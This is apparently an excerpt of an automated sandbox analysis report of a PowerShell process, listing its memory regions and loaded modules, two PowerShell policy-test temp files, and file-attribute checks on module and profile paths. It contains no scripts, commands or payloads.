private_0x00000052e7b00000 0x52e7b00000 0x52e7b7ffff Private Memory Readable, Writable True False False -
private_0x00000052e7b80000 0x52e7b80000 0x52e7bbffff Private Memory Readable, Writable True False False -
private_0x00000194c5350000 0x194c5350000 0x194c536ffff Private Memory Readable, Writable True False False -
pagefile_0x00000194c5350000 0x194c5350000 0x194c535ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000194c5360000 0x194c5360000 0x194c5366fff Private Memory Readable, Writable True False False -
pagefile_0x00000194c5370000 0x194c5370000 0x194c5387fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c5390000 0x194c5390000 0x194c5393fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c53a0000 0x194c53a0000 0x194c53a0fff Pagefile Backed Memory Readable True False False -
private_0x00000194c53b0000 0x194c53b0000 0x194c53b0fff Private Memory Readable, Writable True False False -
locale.nls 0x194c53c0000 0x194c5484fff Memory Mapped File Readable False False False -
private_0x00000194c5490000 0x194c5490000 0x194c5496fff Private Memory Readable, Writable True False False -
pagefile_0x00000194c54a0000 0x194c54a0000 0x194c54a1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c54b0000 0x194c54b0000 0x194c54b0fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x194c54c0000 0x194c54c2fff Memory Mapped File Readable False False False -
private_0x00000194c54d0000 0x194c54d0000 0x194c54d0fff Private Memory Readable, Writable True False False -
private_0x00000194c54e0000 0x194c54e0000 0x194c54e0fff Private Memory Readable, Writable True False False -
private_0x00000194c54f0000 0x194c54f0000 0x194c54f6fff Private Memory Readable, Writable True False False -
pagefile_0x00000194c5500000 0x194c5500000 0x194c5500fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000194c5510000 0x194c5510000 0x194c551ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000194c5520000 0x194c5520000 0x194c561ffff Private Memory Readable, Writable True False False -
private_0x00000194c5620000 0x194c5620000 0x194c562ffff Private Memory Readable, Writable True False False -
private_0x00000194c5630000 0x194c5630000 0x194c5630fff Private Memory Readable, Writable True False False -
private_0x00000194c5640000 0x194c5640000 0x194c5640fff Private Memory Readable, Writable True False False -
private_0x00000194c5650000 0x194c5650000 0x194c565ffff Private Memory Readable, Writable True False False -
private_0x00000194c5660000 0x194c5660000 0x194c56cffff Private Memory Readable, Writable True False False -
private_0x00000194c56d0000 0x194c56d0000 0x194c56dffff Private Memory Readable, Writable True False False -
private_0x00000194c56e0000 0x194c56e0000 0x194c56effff Private Memory Readable, Writable True False False -
pagefile_0x00000194c56f0000 0x194c56f0000 0x194c58f7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c5900000 0x194c5900000 0x194c5a80fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c5a90000 0x194c5a90000 0x194c6e8ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c6e90000 0x194c6e90000 0x194c6e90fff Pagefile Backed Memory Readable True False False -
winnlsres.dll 0x194c6ea0000 0x194c6ea4fff Memory Mapped File Readable False False False -
private_0x00000194c6eb0000 0x194c6eb0000 0x194c6ebffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000194c6ec0000 0x194c6ec0000 0x194c6efbfff Pagefile Backed Memory Readable, Writable True False False -
winnlsres.dll.mui 0x194c6f00000 0x194c6f0ffff Memory Mapped File Readable False False False -
pagefile_0x00000194c6f10000 0x194c6f10000 0x194c6f10fff Pagefile Backed Memory Readable, Writable True False False -
microsoft.powershell.utility.psm1 0x194c6f20000 0x194c6f27fff Memory Mapped File Readable False False False -
pagefile_0x00000194c6f20000 0x194c6f20000 0x194c6f20fff Pagefile Backed Memory Readable True False False -
private_0x00000194c6f30000 0x194c6f30000 0x194c6f3ffff Private Memory Readable, Writable, Executable True False False -
private_0x00000194c6f40000 0x194c6f40000 0x194c703ffff Private Memory Readable, Writable True False False -
private_0x00000194c7040000 0x194c7040000 0x194c704ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x194c7050000 0x194c7386fff Memory Mapped File Readable False False False -
private_0x00000194c7390000 0x194c7390000 0x194c7492fff Private Memory Readable, Writable True False False -
mscorrc.dll 0x194c74a0000 0x194c7501fff Memory Mapped File Readable True False False -
r00000000000d.clb 0x194c7510000 0x194c7515fff Memory Mapped File Readable False False False -
private_0x00000194c7520000 0x194c7520000 0x194c752ffff Private Memory - True False False -
tzres.dll 0x194c7530000 0x194c7530fff Memory Mapped File Readable, Writable False False False -
tzres.dll.mui 0x194c7530000 0x194c753afff Memory Mapped File Readable False False False -
private_0x00000194c7530000 0x194c7530000 0x194c753ffff Private Memory Readable, Writable True False False -
private_0x00000194c7580000 0x194c7580000 0x194c758ffff Private Memory Readable, Writable True False False -
private_0x00000194c7590000 0x194c7590000 0x194df58ffff Private Memory Readable, Writable True False False -
rpcss.dll 0x194df590000 0x194df698fff Memory Mapped File Readable False False False -
pagefile_0x00000194df590000 0x194df590000 0x194df98ffff Pagefile Backed Memory Readable True False False -
microsoft-windows-client-features-wow64-package-automerged-onecore~31bf3856ad364e35~amd64~~10.0.15063.0.cat 0x194df990000 0x194dfa65fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ff8f0000 0x7df5ff8f0000 0x7ff5ff8effff Pagefile Backed Memory - True False False -
private_0x00007ff686ae0000 0x7ff686ae0000 0x7ff686aeffff Private Memory Readable, Writable, Executable True False False -
private_0x00007ff686af0000 0x7ff686af0000 0x7ff686b8ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00007ff686b90000 0x7ff686b90000 0x7ff686c8ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff686c90000 0x7ff686c90000 0x7ff686cb2fff Pagefile Backed Memory Readable True False False -
powershell.exe 0x7ff687ae0000 0x7ff687b4ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff94fe60000 0x7ff94fe60000 0x7ff94fe6ffff Private Memory - True False False -
private_0x00007ff94fe70000 0x7ff94fe70000 0x7ff94fe7ffff Private Memory - True False False -
private_0x00007ff94fe80000 0x7ff94fe80000 0x7ff94ff0ffff Private Memory - True False False -
private_0x00007ff94ff10000 0x7ff94ff10000 0x7ff94ff7ffff Private Memory - True False False -
private_0x00007ff94ff80000 0x7ff94ff80000 0x7ff94ffbffff Private Memory - True False False -
private_0x00007ff94ffc0000 0x7ff94ffc0000 0x7ff94ffcffff Private Memory - True False False -
private_0x00007ff94ffd0000 0x7ff94ffd0000 0x7ff94ffdffff Private Memory - True False False -
private_0x00007ff94ffe0000 0x7ff94ffe0000 0x7ff94ffeffff Private Memory - True False False -
private_0x00007ff94fff0000 0x7ff94fff0000 0x7ff94fffffff Private Memory - True False False -
private_0x00007ff950000000 0x7ff950000000 0x7ff95000ffff Private Memory - True False False -
private_0x00007ff950010000 0x7ff950010000 0x7ff95001ffff Private Memory - True False False -
private_0x00007ff950020000 0x7ff950020000 0x7ff95002ffff Private Memory - True False False -
system.transactions.dll 0x7ff9a8980000 0x7ff9a89cefff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.ni.dll 0x7ff9a89d0000 0x7ff9a8aa5fff Memory Mapped File Readable, Writable, Executable True False False -
system.numerics.ni.dll 0x7ff9a8ab0000 0x7ff9a8afefff Memory Mapped File Readable, Writable, Executable True False False -
system.xml.ni.dll 0x7ff9a8ba0000 0x7ff9a9436fff Memory Mapped File Readable, Writable, Executable True False False -
system.directoryservices.ni.dll 0x7ff9a9440000 0x7ff9a959efff Memory Mapped File Readable, Writable, Executable True False False -
system.management.ni.dll 0x7ff9a95a0000 0x7ff9a96fffff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.ni.dll 0x7ff9aa690000 0x7ff9ac694fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.consolehost.ni.dll 0x7ff9ac6a0000 0x7ff9ac745fff Memory Mapped File Readable, Writable, Executable True False False -
system.core.ni.dll 0x7ff9ac750000 0x7ff9ad10efff Memory Mapped File Readable, Writable, Executable True False False -
system.ni.dll 0x7ff9ad110000 0x7ff9add31fff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x7ff9adf10000 0x7ff9af48dfff Memory Mapped File Readable, Writable, Executable True False False -
msvcr120_clr0400.dll 0x7ff9af490000 0x7ff9af586fff Memory Mapped File Readable, Writable, Executable False False False -
clr.dll 0x7ff9af590000 0x7ff9aff6dfff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.management.infrastructure.ni.dll 0x7ff9b0be0000 0x7ff9b0c7afff Memory Mapped File Readable, Writable, Executable True False False -
atl.dll 0x7ff9b1d50000 0x7ff9b1d6bfff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.security.ni.dll 0x7ff9b21f0000 0x7ff9b224efff Memory Mapped File Readable, Writable, Executable True False False -
clrjit.dll 0x7ff9b2250000 0x7ff9b2363fff Memory Mapped File Readable, Writable, Executable True False False -
system.configuration.ni.dll 0x7ff9b2370000 0x7ff9b2491fff Memory Mapped File Readable, Writable, Executable True False False -
system.data.dll 0x7ff9b24a0000 0x7ff9b27f4fff Memory Mapped File Readable, Writable, Executable True False False -
system.data.ni.dll 0x7ff9b2800000 0x7ff9b30fcfff Memory Mapped File Readable, Writable, Executable True False False -
mpoav.dll 0x7ff9b3510000 0x7ff9b352ffff Memory Mapped File Readable, Writable, Executable False False False -
amsi.dll 0x7ff9b3530000 0x7ff9b353ffff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x7ff9b35a0000 0x7ff9b363cfff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7ff9bec50000 0x7ff9becb2fff Memory Mapped File Readable, Writable, Executable True False False -
version.dll 0x7ff9ce320000 0x7ff9ce329fff Memory Mapped File Readable, Writable, Executable False False False -
gpapi.dll 0x7ff9d9010000 0x7ff9d9031fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ff9d9750000 0x7ff9d9783fff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ff9d9cd0000 0x7ff9d9ce6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ff9d9cf0000 0x7ff9d9cfafff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ff9da050000 0x7ff9da074fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ff9da220000 0x7ff9da234fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ff9da240000 0x7ff9da250fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ff9da260000 0x7ff9da270fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ff9da280000 0x7ff9da2cbfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ff9da2d0000 0x7ff9da518fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32full.dll 0x7ff9da520000 0x7ff9da6a7fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ff9da6b0000 0x7ff9dada2fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ff9dadb0000 0x7ff9dae05fff Memory Mapped File Readable, Writable, Executable False False False -
win32u.dll 0x7ff9dae10000 0x7ff9dae2dfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ff9daee0000 0x7ff9db0a8fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ff9db0b0000 0x7ff9db0f8fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ff9db100000 0x7ff9db169fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x7ff9db170000 0x7ff9db265fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp_win.dll 0x7ff9db270000 0x7ff9db309fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x7ff9db310000 0x7ff9db317fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ff9db380000 0x7ff9db41dfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ff9db420000 0x7ff9db4dffff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ff9db4e0000 0x7ff9dc916fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ff9dcf20000 0x7ff9dcf70fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ff9dcf80000 0x7ff9dcfd8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ff9dd0f0000 0x7ff9dd11cfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ff9dd120000 0x7ff9dd146fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ff9dd150000 0x7ff9dd294fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ff9dd2a0000 0x7ff9dd349fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ff9dd4e0000 0x7ff9dd604fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ff9dd610000 0x7ff9dd6b0fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ff9dd6c0000 0x7ff9dd76dfff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ff9dd770000 0x7ff9dda68fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ff9dda70000 0x7ff9ddb0cfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ff9ddb10000 0x7ff9ddb7bfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ff9ddc60000 0x7ff9ddda9fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ff9dddb0000 0x7ff9ddf8afff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 64 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\fd1hvy\appdata\local\temp\__psscriptpolicytest_35syrs1n.w3d.ps1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
False
c:\users\fd1hvy\appdata\local\temp\__psscriptpolicytest_cygv5j12.bxt.psm1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
False
Host Behavior
File (279)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_35syrs1n.w3d.ps1 desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_cygv5j12.bxt.psm1 desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Fn
Create C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create Pipe \device\namedpipe\pshost.131687220598097879.1504.defaultappdomain.powershell open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_FIRST_PIPE_INSTANCE, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 True 1
Fn
Get Info C:\WINDOWS\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 type = file_type True 2
Fn
Get Info C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe.config type = file_attributes False 3
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell type = file_attributes True 1
Fn
Get Info C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_INPUT_HANDLE type = file_type True 1
Fn
Get Info - type = file_type True 1
Fn
Get Info C:\Users\FD1HVy type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 2
Fn
Get Info C:\Users\FD1HVy\Documents type = file_attributes True 9
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info C:\WINDOWS\system32\wldp.dll type = file_attributes True 3
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\ type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_35syrs1n.w3d.ps1 type = file_type True 2
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_cygv5j12.bxt.psm1 type = file_type True 2
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_35syrs1n.w3d.ps1 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_cygv5j12.bxt.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\FD1HVy\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\FD1HVy\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\ProgramData\Oracle\Java\javapath type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32 type = file_attributes True 1
Fn
Get Info C:\WINDOWS type = file_attributes True 1
Fn
Get Info C:\WINDOWS\System32\Wbem type = file_attributes True 1
Fn
Get Info C:\WINDOWS\System32\WindowsPowerShell\v1.0\ type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps type = file_attributes True 1
Fn
Get Info C:\Program Files\Microsoft Office\root\Client type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules type = file_attributes False 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules type = file_attributes True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Modules.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline type = file_attributes True 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1 type = file_attributes True 2
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache type = file_type True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\Microsoft.PowerShell.Operation.Validation.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 type = file_attributes True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1 type = file_attributes True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 type = file_attributes True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 type = file_attributes True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadline.psd1 type = file_attributes True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 type = file_attributes True 2
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psd1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psm1 type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.cdxml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.xaml type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.ni.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.dll type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules type = file_attributes True 2
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.psd1 type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.psm1 type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.cdxml type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.xaml type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.ni.dll type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Modules.dll type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppLocker type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppvClient type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Appx type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitLocker type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BranchCache type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ConfigCI type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Defender type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DeliveryOptimization type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Dism type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DnsClient type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\International type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\iSCSI type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ISE type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Kds type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils type = file_attributes True 1
Fn
